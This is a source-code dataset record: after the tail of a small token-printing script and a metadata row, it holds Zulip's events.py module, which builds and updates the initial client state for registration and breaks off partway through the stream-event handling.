    one final empty line terminates the stream.
    """
    print('form\tanas\tlemma\txpostag')
    for entry in lines:
        full_token = len(entry) > 1
        if full_token:
            print(entry['string'], entry['anas'], entry['lemma'], entry['hfstana'], sep='\t')
        else:
            print(entry['string'])
    print('')
def main():
    """Entry point: parse the correction CSV on stdin, print xtsv on stdout."""
    lines = read_file()
    print_file(lines)
if __name__ == "__main__":
    main()
| true | true |
f725f2459a905256eb3220d58ce2d66c8bceeae6 | 66,037 | py | Python | zerver/lib/events.py | nipunn1313/zulip | 35f9ed6ebe28c7d66e8a62b2c235f19ad0f44a0b | [
"Apache-2.0"
] | 1 | 2021-06-25T18:10:20.000Z | 2021-06-25T18:10:20.000Z | zerver/lib/events.py | nipunn1313/zulip | 35f9ed6ebe28c7d66e8a62b2c235f19ad0f44a0b | [
"Apache-2.0"
] | 10 | 2021-11-15T17:53:29.000Z | 2022-02-27T13:51:47.000Z | zerver/lib/events.py | nipunn1313/zulip | 35f9ed6ebe28c7d66e8a62b2c235f19ad0f44a0b | [
"Apache-2.0"
] | 1 | 2021-11-30T08:00:26.000Z | 2021-11-30T08:00:26.000Z | # See https://zulip.readthedocs.io/en/latest/subsystems/events-system.html for
# high-level documentation on how this system works.
import copy
import time
from typing import Any, Callable, Collection, Dict, Iterable, Optional, Sequence, Set
from django.conf import settings
from django.utils.translation import gettext as _
from version import API_FEATURE_LEVEL, ZULIP_MERGE_BASE, ZULIP_VERSION
from zerver.lib.actions import (
default_stream_groups_to_dicts_sorted,
do_get_streams,
gather_subscriptions_helper,
get_available_notification_sounds,
get_default_streams_for_realm,
get_owned_bot_dicts,
get_web_public_streams,
get_web_public_subs,
streams_to_dicts_sorted,
)
from zerver.lib.alert_words import user_alert_words
from zerver.lib.avatar import avatar_url
from zerver.lib.bot_config import load_bot_config_template
from zerver.lib.compatibility import is_outdated_server
from zerver.lib.exceptions import JsonableError
from zerver.lib.external_accounts import DEFAULT_EXTERNAL_ACCOUNTS
from zerver.lib.hotspots import get_next_hotspots
from zerver.lib.integrations import EMBEDDED_BOTS, WEBHOOK_INTEGRATIONS
from zerver.lib.message import (
aggregate_unread_data,
apply_unread_message_event,
extract_unread_data_from_um_rows,
get_raw_unread_data,
get_recent_conversations_recipient_id,
get_recent_private_conversations,
get_starred_message_ids,
remove_message_id_from_unread_mgs,
)
from zerver.lib.narrow import check_supported_events_narrow_filter, read_stop_words
from zerver.lib.presence import get_presence_for_user, get_presences_for_realm
from zerver.lib.push_notifications import push_notifications_enabled
from zerver.lib.realm_icon import realm_icon_url
from zerver.lib.realm_logo import get_realm_logo_source, get_realm_logo_url
from zerver.lib.soft_deactivation import reactivate_user_if_soft_deactivated
from zerver.lib.stream_subscription import handle_stream_notifications_compatibility
from zerver.lib.timestamp import datetime_to_timestamp
from zerver.lib.topic import TOPIC_NAME
from zerver.lib.topic_mutes import get_topic_mutes
from zerver.lib.user_groups import user_groups_in_realm_serialized
from zerver.lib.user_mutes import get_user_mutes
from zerver.lib.user_status import get_user_info_dict
from zerver.lib.users import get_cross_realm_dicts, get_raw_user_data, is_administrator_role
from zerver.models import (
MAX_TOPIC_NAME_LENGTH,
Client,
CustomProfileField,
Draft,
Message,
Realm,
RealmUserDefault,
Stream,
UserMessage,
UserProfile,
UserStatus,
custom_profile_fields_for_realm,
get_default_stream_groups,
get_realm_domains,
get_realm_playgrounds,
linkifiers_for_realm,
realm_filters_for_realm,
)
from zerver.tornado.django_api import get_user_events, request_event_queue
from zproject.backends import email_auth_enabled, password_auth_enabled
class RestartEventException(Exception):
    """Special exception signaling that a 'restart' event was
    encountered while applying events in apply_events."""
def add_realm_logo_fields(state: Dict[str, Any], realm: Realm) -> None:
    """Fill `state` with the realm's day and night logo URL/source
    fields, plus the server-wide logo upload size limit."""
    for prefix, night in (("realm_logo", False), ("realm_night_logo", True)):
        state[prefix + "_url"] = get_realm_logo_url(realm, night=night)
        state[prefix + "_source"] = get_realm_logo_source(realm, night=night)
    state["max_logo_file_size_mib"] = settings.MAX_LOGO_FILE_SIZE_MIB
def always_want(msg_type: str) -> bool:
    """Accept every event type.

    fetch_initial_state_data uses this as the `want` predicate when the
    caller passes event_types=None, i.e. "fetch info for every event
    type".  It lives at module level so it is easy to mock.
    """
    return True
def fetch_initial_state_data(
    user_profile: Optional[UserProfile],
    *,
    realm: Optional[Realm] = None,
    event_types: Optional[Iterable[str]] = None,
    queue_id: Optional[str] = "",
    client_gravatar: bool = False,
    user_avatar_url_field_optional: bool = False,
    user_settings_object: bool = False,
    slim_presence: bool = False,
    include_subscribers: bool = True,
    include_streams: bool = True,
) -> Dict[str, Any]:
    """When `event_types` is None, fetches the core data powering the
    web app's `page_params` and `/api/v1/register` (for mobile/terminal
    apps). Can also fetch a subset as determined by `event_types`.
    The user_profile=None code path is used for logged-out public
    access to streams with is_web_public=True.
    Whenever you add new code to this function, you should also add
    corresponding events for changes in the data structures and new
    code to apply_events (and add a test in test_events.py).
    """
    if realm is None:
        assert user_profile is not None
        realm = user_profile.realm
    state: Dict[str, Any] = {"queue_id": queue_id}
    if event_types is None:
        # return True always
        want: Callable[[str], bool] = always_want
    else:
        want = set(event_types).__contains__
    # Show the version info unconditionally.
    state["zulip_version"] = ZULIP_VERSION
    state["zulip_feature_level"] = API_FEATURE_LEVEL
    state["zulip_merge_base"] = ZULIP_MERGE_BASE
    # Spectators (user_profile=None) implicitly have no alert words.
    if want("alert_words"):
        state["alert_words"] = [] if user_profile is None else user_alert_words(user_profile)
    # Spectators can't access full user profiles or personal settings,
    # so there's no need to send custom profile field data.
    if want("custom_profile_fields") and user_profile is not None:
        fields = custom_profile_fields_for_realm(realm.id)
        state["custom_profile_fields"] = [f.as_dict() for f in fields]
        state["custom_profile_field_types"] = {
            item[4]: {"id": item[0], "name": str(item[1])}
            for item in CustomProfileField.ALL_FIELD_TYPES
        }
    if want("hotspots"):
        # Even if we offered special hotspots for guests without an
        # account, we'd maybe need to store their state using cookies
        # or local storage, rather than in the database.
        state["hotspots"] = [] if user_profile is None else get_next_hotspots(user_profile)
    if want("message"):
        # Since the introduction of `anchor="latest"` in the API,
        # `max_message_id` is primarily used for generating `local_id`
        # values that are higher than this. We likely can eventually
        # remove this parameter from the API.
        user_messages = []
        if user_profile is not None:
            user_messages = (
                UserMessage.objects.filter(user_profile=user_profile)
                .order_by("-message_id")
                .values("message_id")[:1]
            )
        if user_messages:
            state["max_message_id"] = user_messages[0]["message_id"]
        else:
            state["max_message_id"] = -1
    if want("drafts"):
        # Note: if a user ever disables syncing drafts then all of
        # their old drafts stored on the server will be deleted and
        # simply retained in local storage. In which case user_drafts
        # would just be an empty queryset.
        # NOTE(review): unlike most sections, this one does not
        # special-case user_profile=None -- TODO confirm spectators
        # can never request "drafts".
        user_draft_objects = Draft.objects.filter(user_profile=user_profile).order_by(
            "-last_edit_time"
        )[: settings.MAX_DRAFTS_IN_REGISTER_RESPONSE]
        user_draft_dicts = [draft.to_dict() for draft in user_draft_objects]
        state["drafts"] = user_draft_dicts
    if want("muted_topics"):
        state["muted_topics"] = [] if user_profile is None else get_topic_mutes(user_profile)
    if want("muted_users"):
        state["muted_users"] = [] if user_profile is None else get_user_mutes(user_profile)
    if want("presence"):
        state["presences"] = (
            {} if user_profile is None else get_presences_for_realm(realm, slim_presence)
        )
        # Send server_timestamp, to match the format of `GET /presence` requests.
        state["server_timestamp"] = time.time()
    if want("realm"):
        # The realm bundle includes both realm properties and server
        # properties, since it's rare that one would want one and not
        # the other. We expect most clients to want it.
        #
        # A note on naming: For some settings, one could imagine
        # having a server-level value and a realm-level value (with
        # the server value serving as the default for the realm
        # value). For such settings, we prefer the following naming
        # scheme:
        #
        # * realm_inline_image_preview (current realm setting)
        # * server_inline_image_preview (server-level default)
        #
        # In situations where for backwards-compatibility reasons we
        # have an unadorned name, we should arrange that clients using
        # that unadorned name work correctly (i.e. that should be the
        # currently active setting, not a server-level default).
        #
        # Other settings, which are just server-level settings or data
        # about the version of Zulip, can be named without prefixes,
        # e.g. giphy_rating_options or development_environment.
        for property_name in Realm.property_types:
            state["realm_" + property_name] = getattr(realm, property_name)
        # Most state is handled via the property_types framework;
        # these manual entries are for those realm settings that don't
        # fit into that framework.
        state["realm_authentication_methods"] = realm.authentication_methods_dict()
        # We pretend these features are disabled because anonymous
        # users can't access them. In the future, we may want to move
        # this logic to the frontends, so that we can correctly
        # display what these fields are in the settings.
        state["realm_allow_message_editing"] = (
            False if user_profile is None else realm.allow_message_editing
        )
        state["realm_edit_topic_policy"] = (
            Realm.POLICY_ADMINS_ONLY if user_profile is None else realm.edit_topic_policy
        )
        state["realm_delete_own_message_policy"] = (
            Realm.POLICY_ADMINS_ONLY if user_profile is None else realm.delete_own_message_policy
        )
        # TODO: Can we delete these lines? They seem to be in property_types...
        state["realm_message_content_edit_limit_seconds"] = realm.message_content_edit_limit_seconds
        state[
            "realm_message_content_delete_limit_seconds"
        ] = realm.message_content_delete_limit_seconds
        state[
            "realm_community_topic_editing_limit_seconds"
        ] = Realm.DEFAULT_COMMUNITY_TOPIC_EDITING_LIMIT_SECONDS
        # This setting determines whether to send presence and also
        # whether to display of the users list in the right sidebar; we
        # want both behaviors for logged-out users. We may in the
        # future choose to move this logic to the frontend.
        state["realm_presence_disabled"] = True if user_profile is None else realm.presence_disabled
        # Important: Encode units in the client-facing API name.
        state["max_avatar_file_size_mib"] = settings.MAX_AVATAR_FILE_SIZE_MIB
        state["max_file_upload_size_mib"] = settings.MAX_FILE_UPLOAD_SIZE
        state["max_icon_file_size_mib"] = settings.MAX_ICON_FILE_SIZE_MIB
        state["realm_upload_quota_mib"] = realm.upload_quota_bytes()
        state["realm_icon_url"] = realm_icon_url(realm)
        state["realm_icon_source"] = realm.icon_source
        add_realm_logo_fields(state, realm)
        state["realm_uri"] = realm.uri
        state["realm_bot_domain"] = realm.get_bot_domain()
        state["realm_available_video_chat_providers"] = realm.VIDEO_CHAT_PROVIDERS
        state["settings_send_digest_emails"] = settings.SEND_DIGEST_EMAILS
        state["realm_digest_emails_enabled"] = (
            realm.digest_emails_enabled and settings.SEND_DIGEST_EMAILS
        )
        state["realm_email_auth_enabled"] = email_auth_enabled(realm)
        state["realm_password_auth_enabled"] = password_auth_enabled(realm)
        state["server_generation"] = settings.SERVER_GENERATION
        state["realm_is_zephyr_mirror_realm"] = realm.is_zephyr_mirror_realm
        state["development_environment"] = settings.DEVELOPMENT
        state["realm_plan_type"] = realm.plan_type
        state["zulip_plan_is_not_limited"] = realm.plan_type != Realm.PLAN_TYPE_LIMITED
        state["upgrade_text_for_wide_organization_logo"] = str(Realm.UPGRADE_TEXT_STANDARD)
        state["password_min_length"] = settings.PASSWORD_MIN_LENGTH
        state["password_min_guesses"] = settings.PASSWORD_MIN_GUESSES
        state["server_inline_image_preview"] = settings.INLINE_IMAGE_PREVIEW
        state["server_inline_url_embed_preview"] = settings.INLINE_URL_EMBED_PREVIEW
        state["server_avatar_changes_disabled"] = settings.AVATAR_CHANGES_DISABLED
        state["server_name_changes_disabled"] = settings.NAME_CHANGES_DISABLED
        state["server_web_public_streams_enabled"] = settings.WEB_PUBLIC_STREAMS_ENABLED
        state["giphy_rating_options"] = realm.GIPHY_RATING_OPTIONS
        state["server_needs_upgrade"] = is_outdated_server(user_profile)
        state[
            "event_queue_longpoll_timeout_seconds"
        ] = settings.EVENT_QUEUE_LONGPOLL_TIMEOUT_SECONDS
        # TODO: Should these have the realm prefix replaced with server_?
        state["realm_push_notifications_enabled"] = push_notifications_enabled()
        state["realm_default_external_accounts"] = DEFAULT_EXTERNAL_ACCOUNTS
        if settings.JITSI_SERVER_URL is not None:
            state["jitsi_server_url"] = settings.JITSI_SERVER_URL.rstrip("/")
        else:  # nocoverage
            state["jitsi_server_url"] = None
        if realm.notifications_stream and not realm.notifications_stream.deactivated:
            notifications_stream = realm.notifications_stream
            state["realm_notifications_stream_id"] = notifications_stream.id
        else:
            # -1 is the sentinel for "no notifications stream".
            state["realm_notifications_stream_id"] = -1
        signup_notifications_stream = realm.get_signup_notifications_stream()
        if signup_notifications_stream:
            state["realm_signup_notifications_stream_id"] = signup_notifications_stream.id
        else:
            state["realm_signup_notifications_stream_id"] = -1
        state["max_stream_name_length"] = Stream.MAX_NAME_LENGTH
        state["max_stream_description_length"] = Stream.MAX_DESCRIPTION_LENGTH
        state["max_topic_length"] = MAX_TOPIC_NAME_LENGTH
        state["max_message_length"] = settings.MAX_MESSAGE_LENGTH
        if realm.demo_organization_scheduled_deletion_date is not None:
            state["demo_organization_scheduled_deletion_date"] = datetime_to_timestamp(
                realm.demo_organization_scheduled_deletion_date
            )
    if want("realm_user_settings_defaults"):
        realm_user_default = RealmUserDefault.objects.get(realm=realm)
        state["realm_user_settings_defaults"] = {}
        for property_name in RealmUserDefault.property_types:
            state["realm_user_settings_defaults"][property_name] = getattr(
                realm_user_default, property_name
            )
        state["realm_user_settings_defaults"][
            "emojiset_choices"
        ] = RealmUserDefault.emojiset_choices()
        state["realm_user_settings_defaults"][
            "available_notification_sounds"
        ] = get_available_notification_sounds()
    if want("realm_domains"):
        state["realm_domains"] = get_realm_domains(realm)
    if want("realm_emoji"):
        state["realm_emoji"] = realm.get_emoji()
    if want("realm_linkifiers"):
        state["realm_linkifiers"] = linkifiers_for_realm(realm.id)
    # Backwards compatibility code.
    if want("realm_filters"):
        state["realm_filters"] = realm_filters_for_realm(realm.id)
    if want("realm_playgrounds"):
        state["realm_playgrounds"] = get_realm_playgrounds(realm)
    if want("realm_user_groups"):
        state["realm_user_groups"] = user_groups_in_realm_serialized(realm)
    if user_profile is not None:
        settings_user = user_profile
    else:
        # When UserProfile=None, we want to serve the values for various
        # settings as the defaults. Instead of copying the default values
        # from models.py here, we access these default values from a
        # temporary UserProfile object that will not be saved to the database.
        #
        # We also can set various fields to avoid duplicating code
        # unnecessarily.
        settings_user = UserProfile(
            full_name="Anonymous User",
            email="username@example.com",
            delivery_email="username@example.com",
            realm=realm,
            # We tag logged-out users as guests because most guest
            # restrictions apply to these users as well, and it lets
            # us avoid unnecessary conditionals.
            role=UserProfile.ROLE_GUEST,
            is_billing_admin=False,
            avatar_source=UserProfile.AVATAR_FROM_GRAVATAR,
            # ID=0 is not used in real Zulip databases, ensuring this is unique.
            id=0,
        )
    if want("realm_user"):
        state["raw_users"] = get_raw_user_data(
            realm,
            user_profile,
            client_gravatar=client_gravatar,
            user_avatar_url_field_optional=user_avatar_url_field_optional,
            # Don't send custom profile field values to spectators.
            include_custom_profile_fields=user_profile is not None,
        )
        state["cross_realm_bots"] = list(get_cross_realm_dicts())
        # For the user's own avatar URL, we force
        # client_gravatar=False, since that saves some unnecessary
        # client-side code for handing medium-size avatars. See #8253
        # for details.
        state["avatar_source"] = settings_user.avatar_source
        state["avatar_url_medium"] = avatar_url(
            settings_user,
            medium=True,
            client_gravatar=False,
        )
        state["avatar_url"] = avatar_url(
            settings_user,
            medium=False,
            client_gravatar=False,
        )
        state["can_create_private_streams"] = settings_user.can_create_private_streams()
        state["can_create_public_streams"] = settings_user.can_create_public_streams()
        # TODO/compatibility: Deprecated in Zulip 5.0 (feature level
        # 102); we can remove this once we no longer need to support
        # legacy mobile app versions that read the old property.
        state["can_create_streams"] = (
            settings_user.can_create_private_streams()
            or settings_user.can_create_public_streams()
            or settings_user.can_create_web_public_streams()
        )
        state["can_create_web_public_streams"] = settings_user.can_create_web_public_streams()
        state["can_subscribe_other_users"] = settings_user.can_subscribe_other_users()
        state["can_invite_others_to_realm"] = settings_user.can_invite_others_to_realm()
        state["is_admin"] = settings_user.is_realm_admin
        state["is_owner"] = settings_user.is_realm_owner
        state["is_moderator"] = settings_user.is_moderator
        state["is_guest"] = settings_user.is_guest
        state["is_billing_admin"] = settings_user.is_billing_admin
        state["user_id"] = settings_user.id
        state["email"] = settings_user.email
        state["delivery_email"] = settings_user.delivery_email
        state["full_name"] = settings_user.full_name
    if want("realm_bot"):
        state["realm_bots"] = [] if user_profile is None else get_owned_bot_dicts(user_profile)
    # This does not yet have an apply_event counterpart, since currently,
    # new entries for EMBEDDED_BOTS can only be added directly in the codebase.
    if want("realm_embedded_bots"):
        realm_embedded_bots = []
        for bot in EMBEDDED_BOTS:
            realm_embedded_bots.append(
                {"name": bot.name, "config": load_bot_config_template(bot.name)}
            )
        state["realm_embedded_bots"] = realm_embedded_bots
    # This does not have an apply_events counterpart either since
    # this data is mostly static.
    if want("realm_incoming_webhook_bots"):
        realm_incoming_webhook_bots = []
        for integration in WEBHOOK_INTEGRATIONS:
            realm_incoming_webhook_bots.append(
                {
                    "name": integration.name,
                    "config": {c[1]: c[0] for c in integration.config_options},
                }
            )
        state["realm_incoming_webhook_bots"] = realm_incoming_webhook_bots
    if want("recent_private_conversations"):
        # A data structure containing records of this form:
        #
        #   [{'max_message_id': 700175, 'user_ids': [801]}]
        #
        # for all recent private message conversations, ordered by the
        # highest message ID in the conversation. The user_ids list
        # is the list of users other than the current user in the
        # private message conversation (so it is [] for PMs to self).
        # Note that raw_recent_private_conversations is an
        # intermediate form as a dictionary keyed by recipient_id,
        # which is more efficient to update, and is rewritten to the
        # final format in post_process_state.
        state["raw_recent_private_conversations"] = (
            {} if user_profile is None else get_recent_private_conversations(user_profile)
        )
    if want("subscription"):
        if user_profile is not None:
            sub_info = gather_subscriptions_helper(
                user_profile,
                include_subscribers=include_subscribers,
            )
        else:
            sub_info = get_web_public_subs(realm)
        state["subscriptions"] = sub_info.subscriptions
        state["unsubscribed"] = sub_info.unsubscribed
        state["never_subscribed"] = sub_info.never_subscribed
    if want("update_message_flags") and want("message"):
        # Keeping unread_msgs updated requires both message flag updates and
        # message updates. This is due to the fact that new messages will not
        # generate a flag update so we need to use the flags field in the
        # message event.
        if user_profile is not None:
            state["raw_unread_msgs"] = get_raw_unread_data(user_profile)
        else:
            # For logged-out visitors, we treat all messages as read;
            # calling this helper lets us return empty objects in the
            # appropriate format.
            state["raw_unread_msgs"] = extract_unread_data_from_um_rows([], user_profile)
    if want("starred_messages"):
        state["starred_messages"] = (
            [] if user_profile is None else get_starred_message_ids(user_profile)
        )
    if want("stream"):
        if include_streams:
            # The web app doesn't use the data from here; instead,
            # it uses data from state["subscriptions"] and other
            # places.
            if user_profile is not None:
                state["streams"] = do_get_streams(
                    user_profile, include_all_active=user_profile.is_realm_admin
                )
            else:
                # TODO: This line isn't used by the web app because it
                # gets these data via the `subscriptions` key; it will
                # be used when the mobile apps support logged-out
                # access.
                state["streams"] = get_web_public_streams(realm)  # nocoverage
    if want("default_streams"):
        if settings_user.is_guest:
            # Guest users and logged-out users don't have access to
            # all default streams, so we pretend the organization
            # doesn't have any.
            state["realm_default_streams"] = []
        else:
            state["realm_default_streams"] = streams_to_dicts_sorted(
                get_default_streams_for_realm(realm.id)
            )
    if want("default_stream_groups"):
        if settings_user.is_guest:
            state["realm_default_stream_groups"] = []
        else:
            state["realm_default_stream_groups"] = default_stream_groups_to_dicts_sorted(
                get_default_stream_groups(realm)
            )
    # Stop-word list shared with the narrow/search code (see read_stop_words).
    if want("stop_words"):
        state["stop_words"] = read_stop_words()
    if want("update_display_settings") and not user_settings_object:
        for prop in UserProfile.display_settings_legacy:
            state[prop] = getattr(settings_user, prop)
        state["emojiset_choices"] = UserProfile.emojiset_choices()
        state["timezone"] = settings_user.timezone
    if want("update_global_notifications") and not user_settings_object:
        for notification in UserProfile.notification_settings_legacy:
            state[notification] = getattr(settings_user, notification)
        state["available_notification_sounds"] = get_available_notification_sounds()
    if want("user_settings"):
        state["user_settings"] = {}
        for prop in UserProfile.property_types:
            state["user_settings"][prop] = getattr(settings_user, prop)
        state["user_settings"]["emojiset_choices"] = UserProfile.emojiset_choices()
        state["user_settings"]["timezone"] = settings_user.timezone
        state["user_settings"][
            "available_notification_sounds"
        ] = get_available_notification_sounds()
    if want("user_status"):
        # We require creating an account to access statuses.
        state["user_status"] = {} if user_profile is None else get_user_info_dict(realm_id=realm.id)
    if want("video_calls"):
        # Whether a Zoom OAuth token is on file for this user.
        state["has_zoom_token"] = settings_user.zoom_token is not None
    if want("giphy"):
        # Normally, it would be a nasty security bug to send a
        # server's API key to end users. However, GIPHY's API key
        # security model is precisely to do that; every service
        # publishes its API key (and GIPHY's client-side JS libraries
        # require the API key to work). This security model makes
        # sense because GIPHY API keys are all essentially equivalent
        # in letting one search for GIFs; GIPHY only requires API keys
        # to exist at all so that they can deactivate them in cases of
        # abuse.
        state["giphy_api_key"] = settings.GIPHY_API_KEY if settings.GIPHY_API_KEY else ""
    if user_profile is None:
        # To ensure we have the correct user state set.
        assert state["is_admin"] is False
        assert state["is_owner"] is False
        assert state["is_guest"] is True
    return state
def apply_events(
    user_profile: UserProfile,
    *,
    state: Dict[str, Any],
    events: Iterable[Dict[str, Any]],
    fetch_event_types: Optional[Collection[str]],
    client_gravatar: bool,
    slim_presence: bool,
    include_subscribers: bool,
) -> None:
    """Apply each event, in order, to `state` (mutated in place).

    A 'restart' event aborts the whole computation via
    RestartEventException.  When fetch_event_types is given, events of
    other types are skipped.
    """
    for event in events:
        event_type = event["type"]
        if event_type == "restart":
            raise RestartEventException()
        # TODO: This filter is not, most precisely, correct: an event
        # of one type (e.g. `realm_user`) could modify state that
        # doesn't come from that `fetch_event_types` value, e.g. the
        # `our_person` part of that code path. But such cases should
        # be extremely rare, and fixing this would require a
        # nontrivial refactor of `apply_event`, so for now callers
        # must be careful in their choice of `fetch_event_types`.
        if fetch_event_types is None or event_type in fetch_event_types:
            apply_event(
                user_profile,
                state=state,
                event=event,
                client_gravatar=client_gravatar,
                slim_presence=slim_presence,
                include_subscribers=include_subscribers,
            )
def apply_event(
    user_profile: UserProfile,
    *,
    state: Dict[str, Any],
    event: Dict[str, Any],
    client_gravatar: bool,
    slim_presence: bool,
    include_subscribers: bool,
) -> None:
    """Mutate the /register initial-state payload `state` in place so that it
    reflects `event`.

    This is used to apply events that arrived while the initial state was
    being computed (see do_events_register).  The flag arguments
    (client_gravatar, slim_presence, include_subscribers) must match the
    flags used to build `state`, since they control which fields are
    present and how they are formatted.

    Raises AssertionError for event types/ops this function does not know
    how to apply.
    """
    if event["type"] == "message":
        state["max_message_id"] = max(state["max_message_id"], event["message"]["id"])
        if "raw_unread_msgs" in state:
            apply_unread_message_event(
                user_profile,
                state["raw_unread_msgs"],
                event["message"],
                event["flags"],
            )
        if event["message"]["type"] != "stream":
            if "raw_recent_private_conversations" in state:
                # Handle maintaining the recent_private_conversations data structure.
                conversations = state["raw_recent_private_conversations"]
                recipient_id = get_recent_conversations_recipient_id(
                    user_profile, event["message"]["recipient_id"], event["message"]["sender_id"]
                )
                if recipient_id not in conversations:
                    conversations[recipient_id] = dict(
                        user_ids=sorted(
                            user_dict["id"]
                            for user_dict in event["message"]["display_recipient"]
                            if user_dict["id"] != user_profile.id
                        ),
                    )
                conversations[recipient_id]["max_message_id"] = event["message"]["id"]
            return
        # Below, we handle maintaining first_message_id.
        for sub_dict in state.get("subscriptions", []):
            if event["message"]["stream_id"] == sub_dict["stream_id"]:
                if sub_dict["first_message_id"] is None:
                    sub_dict["first_message_id"] = event["message"]["id"]
        for stream_dict in state.get("streams", []):
            if event["message"]["stream_id"] == stream_dict["stream_id"]:
                if stream_dict["first_message_id"] is None:
                    stream_dict["first_message_id"] = event["message"]["id"]
    elif event["type"] == "heartbeat":
        # It may be impossible for a heartbeat event to actually reach
        # this code path. But in any case, they're noops.
        pass
    elif event["type"] == "drafts":
        if event["op"] == "add":
            state["drafts"].extend(event["drafts"])
        else:
            # "update" and "remove" share the linear-search logic below;
            # only the action applied at the found index differs.
            if event["op"] == "update":
                event_draft_idx = event["draft"]["id"]
                def _draft_update_action(i: int) -> None:
                    state["drafts"][i] = event["draft"]
            elif event["op"] == "remove":
                event_draft_idx = event["draft_id"]
                def _draft_update_action(i: int) -> None:
                    del state["drafts"][i]
            # We have to perform a linear search for the draft that
            # was either edited or removed since we have a list
            # ordered by the last edited timestamp and not id.
            state_draft_idx = None
            for idx, draft in enumerate(state["drafts"]):
                if draft["id"] == event_draft_idx:
                    state_draft_idx = idx
                    break
            assert state_draft_idx is not None
            _draft_update_action(state_draft_idx)
    elif event["type"] == "hotspots":
        state["hotspots"] = event["hotspots"]
    elif event["type"] == "custom_profile_fields":
        # Replace the field definitions, then prune any per-user profile
        # data referring to fields that no longer exist.
        state["custom_profile_fields"] = event["fields"]
        custom_profile_field_ids = {field["id"] for field in state["custom_profile_fields"]}
        if "raw_users" in state:
            for user_dict in state["raw_users"].values():
                if "profile_data" not in user_dict:
                    continue
                profile_data = user_dict["profile_data"]
                for (field_id, field_data) in list(profile_data.items()):
                    if int(field_id) not in custom_profile_field_ids:
                        del profile_data[field_id]
    elif event["type"] == "realm_user":
        person = event["person"]
        person_user_id = person["user_id"]
        if event["op"] == "add":
            person = copy.deepcopy(person)
            if client_gravatar:
                if person["avatar_url"].startswith("https://secure.gravatar.com"):
                    person["avatar_url"] = None
            person["is_active"] = True
            if not person["is_bot"]:
                person["profile_data"] = {}
            state["raw_users"][person_user_id] = person
        elif event["op"] == "remove":
            state["raw_users"][person_user_id]["is_active"] = False
        elif event["op"] == "update":
            is_me = person_user_id == user_profile.id
            if is_me:
                if "avatar_url" in person and "avatar_url" in state:
                    state["avatar_source"] = person["avatar_source"]
                    state["avatar_url"] = person["avatar_url"]
                    state["avatar_url_medium"] = person["avatar_url_medium"]
                if "role" in person:
                    state["is_admin"] = is_administrator_role(person["role"])
                    state["is_owner"] = person["role"] == UserProfile.ROLE_REALM_OWNER
                    state["is_moderator"] = person["role"] == UserProfile.ROLE_MODERATOR
                    state["is_guest"] = person["role"] == UserProfile.ROLE_GUEST
                    # Recompute properties based on is_admin/is_guest
                    state["can_create_private_streams"] = user_profile.can_create_private_streams()
                    state["can_create_public_streams"] = user_profile.can_create_public_streams()
                    state[
                        "can_create_web_public_streams"
                    ] = user_profile.can_create_web_public_streams()
                    state["can_create_streams"] = (
                        state["can_create_private_streams"]
                        or state["can_create_public_streams"]
                        or state["can_create_web_public_streams"]
                    )
                    state["can_subscribe_other_users"] = user_profile.can_subscribe_other_users()
                    state["can_invite_others_to_realm"] = user_profile.can_invite_others_to_realm()
                    # TODO: Probably rather than writing the perfect
                    # live-update code for the case of racing with the
                    # current user changing roles, we should just do a
                    # full refetch.
                    if "never_subscribed" in state:
                        sub_info = gather_subscriptions_helper(
                            user_profile,
                            include_subscribers=include_subscribers,
                        )
                        state["subscriptions"] = sub_info.subscriptions
                        state["unsubscribed"] = sub_info.unsubscribed
                        state["never_subscribed"] = sub_info.never_subscribed
                    if "streams" in state:
                        state["streams"] = do_get_streams(
                            user_profile, include_all_active=user_profile.is_realm_admin
                        )
                    if state["is_guest"]:
                        state["realm_default_streams"] = []
                    else:
                        state["realm_default_streams"] = streams_to_dicts_sorted(
                            get_default_streams_for_realm(user_profile.realm_id)
                        )
                for field in ["delivery_email", "email", "full_name", "is_billing_admin"]:
                    if field in person and field in state:
                        state[field] = person[field]
                if "new_email" in person:
                    state["email"] = person["new_email"]
                # In the unlikely event that the current user
                # just changed to/from being an admin, we need
                # to add/remove the data on all bots in the
                # realm. This is ugly and probably better
                # solved by removing the all-realm-bots data
                # given to admin users from this flow.
                if "role" in person and "realm_bots" in state:
                    prev_state = state["raw_users"][user_profile.id]
                    was_admin = prev_state["is_admin"]
                    now_admin = is_administrator_role(person["role"])
                    if was_admin and not now_admin:
                        state["realm_bots"] = []
                    if not was_admin and now_admin:
                        state["realm_bots"] = get_owned_bot_dicts(user_profile)
            if client_gravatar and "avatar_url" in person:
                # Respect the client_gravatar setting in the `users` data.
                if person["avatar_url"].startswith("https://secure.gravatar.com"):
                    person["avatar_url"] = None
                    person["avatar_url_medium"] = None
            if person_user_id in state["raw_users"]:
                p = state["raw_users"][person_user_id]
                for field in p:
                    if field in person:
                        p[field] = person[field]
                    if "role" in person:
                        p["is_admin"] = is_administrator_role(person["role"])
                        p["is_owner"] = person["role"] == UserProfile.ROLE_REALM_OWNER
                        p["is_guest"] = person["role"] == UserProfile.ROLE_GUEST
                    if "is_billing_admin" in person:
                        p["is_billing_admin"] = person["is_billing_admin"]
                    if "custom_profile_field" in person:
                        custom_field_id = person["custom_profile_field"]["id"]
                        custom_field_new_value = person["custom_profile_field"]["value"]
                        if "rendered_value" in person["custom_profile_field"]:
                            p["profile_data"][str(custom_field_id)] = {
                                "value": custom_field_new_value,
                                "rendered_value": person["custom_profile_field"]["rendered_value"],
                            }
                        else:
                            p["profile_data"][str(custom_field_id)] = {
                                "value": custom_field_new_value,
                            }
                    if "new_email" in person:
                        p["email"] = person["new_email"]
        else:
            raise AssertionError("Unexpected event type {type}/{op}".format(**event))
    elif event["type"] == "realm_bot":
        if event["op"] == "add":
            state["realm_bots"].append(event["bot"])
        elif event["op"] == "remove":
            user_id = event["bot"]["user_id"]
            for bot in state["realm_bots"]:
                if bot["user_id"] == user_id:
                    bot["is_active"] = False
        elif event["op"] == "delete":
            state["realm_bots"] = [
                item for item in state["realm_bots"] if item["user_id"] != event["bot"]["user_id"]
            ]
        elif event["op"] == "update":
            for bot in state["realm_bots"]:
                if bot["user_id"] == event["bot"]["user_id"]:
                    if "owner_id" in event["bot"]:
                        bot_owner_id = event["bot"]["owner_id"]
                        bot["owner_id"] = bot_owner_id
                    else:
                        bot.update(event["bot"])
        else:
            raise AssertionError("Unexpected event type {type}/{op}".format(**event))
    elif event["type"] == "stream":
        # NOTE: the "create"/"delete"/"update" ops below use independent
        # `if` statements (not elif) and have no trailing AssertionError.
        if event["op"] == "create":
            for stream in event["streams"]:
                if not stream["invite_only"]:
                    stream_data = copy.deepcopy(stream)
                    if include_subscribers:
                        stream_data["subscribers"] = []
                    # We know the stream has no traffic, and this
